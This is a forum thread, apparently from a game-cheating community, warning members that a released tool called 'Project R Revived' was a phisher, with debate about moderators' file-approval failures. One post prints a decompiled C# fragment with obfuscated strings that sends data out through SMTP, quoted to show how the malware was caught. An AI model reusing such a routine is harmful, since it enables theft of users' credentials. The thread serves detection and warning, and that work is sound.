WARNING: If you downloaded " Project R Revived" By RaphaCobra

[Royce]

My god...fuck. But let me get this straight, isn't RaphaCobra Drowlys? feel free to correct me if I am wrong.

Man he probably has hacked so many people.

what do you say that rapha is drowlys?

[Bountyxxx]

what do you say that rapha is drowlys?

Idk I am only guessing because after DrMini got hacked by Drowlys, I thought this project thing was by him but I could be wrong. Welp. RIP MegaXDD

[Royce]

Idk I am only guessing because after DrMini got hacked by Drowlys, I thought this project thing was by him but I could be wrong. Welp. RIP MegaXDD

Who is drmini and why was he hacked ?

also mega banned ?

[Bountyxxx]

Who is drmini and why was he hacked ?

also mega banned ?

Bro he was the top assassin(#fameexploiterof2013)

You can realmeye him.

[[MPGH]Hero]

Kiddies are kiddies, but they also can use virustotal, obfuscators and shitty crypters (100% of them are shit).
People should stop relying on their AV and only test the program behaviour.
AV are not magical.

To be honest, smart people can delay the bad behaviour of their virus to pass the validation process.
If it is a regular program (not .NET) i understand the detection can difficult but ... in .NET, source code is readable.
Most of the obfuscators can be removed in one mouse click.

Like i said, browse the code. Here, the credentials werent in clear text BUT... There was CLEAR refererences to NetworkCredentials, SMTP

Code:

 SmtpClient client = new SmtpClient {
        EnableSsl = true,
        UseDefaultCredentials = false,
        Host = string_9 + string_0.Replace(string_4, string_10).Replace("@", ""),
        Port = 0x24b,
        DeliveryMethod = SmtpDeliveryMethod.Network,
        Credentials = new NetworkCredential(string_0.Replace(string_4, string_5), string_6),
        Timeout = 0x4e20
    };
    MailMessage message = new MailMessage(string_0.Replace(string_4, string_5), string_0.Replace(string_4, string_5), string_11, string_12);
    client.Send(message);
}

Setup your firewall to always ask when you test, and its settled (unless...they use some kind of firewall bypassing but this should be handled by default by your AV/firewall.... Its called Injection, or RunPE)

So he can use you browser to send emails.

Yeah mate. The nuts and bolts of the program is what matters at the end of the day.

[FainTMako]

its called complacent.

You get used to accepting releases your quality control goes down. I never expected the releases to be virus free.
There are way too many kids on here. But what this person did was not complicated. Stop trying to lightly cover it up.
anyone with some sort of sniffer should be able to tell that it is generating excess traffic.

You mind as well not run the releases through any kind of checks. to be honest your system is weak. if you think that 2 separate antivirus scans mean shit then your an idiot no offense. Look up 0day releases. I used to be all over that shit..

But shit like this happens when you deal with anything that is against the rules. your going to have to go to alternate sources to get your goods and i hate to say it but kabam cares more for your security than many people on this website do.

[krazyshank]

This is why I don't like to deal with windows based stuff , I really can't check it . I might have to download something that lets me read any file .exe file codes



I can't do much from a mac... Plus it was distraught job to deal with it

Yeah you should ask me/jnoob/whoever for help with that.

[Distraught]

Yeah mate. The nuts and bolts of the program is what matters at the end of the day.

My apologies for not being around to help deal with this. As you know I've had a lot going on this past week. Well I've deleted this exact file how many times now. I didn't think Royce would go about approving it without messaging a GMOD+. It was a basic SMTP client, connects to the internet, should of been deleted off that.

I can't do much from a mac... Plus it was distraught job to deal with it

Yes totally my job. How many times have I deleted this specific file?

https://puu.sh/6egVT/623ab44cc1.png

You should be just as capable as me when decompiling files.

[Yotsuba]

Just a bit curious, would anyone telling me what Project R Revived was?

[Distraught]

Just a bit curious, would anyone telling me what Project R Revived was?

or better yet a phisher.

[Raple]

Great, another damn phisher in the RotMG section.

[Yotsuba]

or better yet a phisher.

I'm not one to talk but the tool looks so poorly made, why would anyone even think of downloading it!?

[[MPGH]master131]

This is why I don't like to deal with windows based stuff , I really can't check it . I might have to download something that lets me read any file .exe file codes

I can't do much from a mac...

Well then don't approve it. If you're on a non-Windows OS, use VirtualBox or Parallels.

You get used to accepting releases your quality control goes down. I never expected the releases to be virus free.
There are way too many kids on here. But what this person did was not complicated. Stop trying to lightly cover it up.
anyone with some sort of sniffer should be able to tell that it is generating excess traffic.

Excess traffic? Not really... Maybe a strange SMTP connection packet.

You mind as well not run the releases through any kind of checks. to be honest your system is weak. if you think that 2 separate antivirus scans mean shit then your an idiot no offense. Look up 0day releases. I used to be all over that shit.

We have procedures in place that are designed to deal with 0day releases. We are well aware that a lot of content is created by members and therefore are often not detected by antivirus heuristics. Obviously, the person who approved the file slipped up and didn't follow the procedure properly and approved the file without realizing it was malicious. Unfortunately these things happen sometimes and the "issue" has been dealt with. You can obviously see that the staff here are perfectly capable of dealing with such files as shown here.

[SMILLY]

My apologies for not being around to help deal with this. As you know I've had a lot going on this past week. Well I've deleted this exact file how many times now. I didn't think Royce would go about approving it without messaging a GMOD+. It was a basic SMTP client, connects to the internet, should of been deleted off that.

[COLOR="Indigo"]

Yes totally my job. How many times have I deleted this specific file?

https://puu.sh/6egVT/623ab44cc1.png

You should be just as capable as me when decompiling files.

How would i know dude, It was open for 3 days and were you active in between that and it was never deleted so idk what to do....

[FainTMako]

Excess traffic? Not really... Maybe a strange SMTP connection packet.

I apologize i didnt know that rotmg regularly sent smtp traffic.
Would you not consider a smtp packet being sent when there should never be one sent as excessive?

Edit,

In addition, you missed my point on 0day releases. I would not consider this a 0day release it is a simple exploit that can be repeated over an over again. its easy, detection is easy. It wasnt checked well enough, thats easy.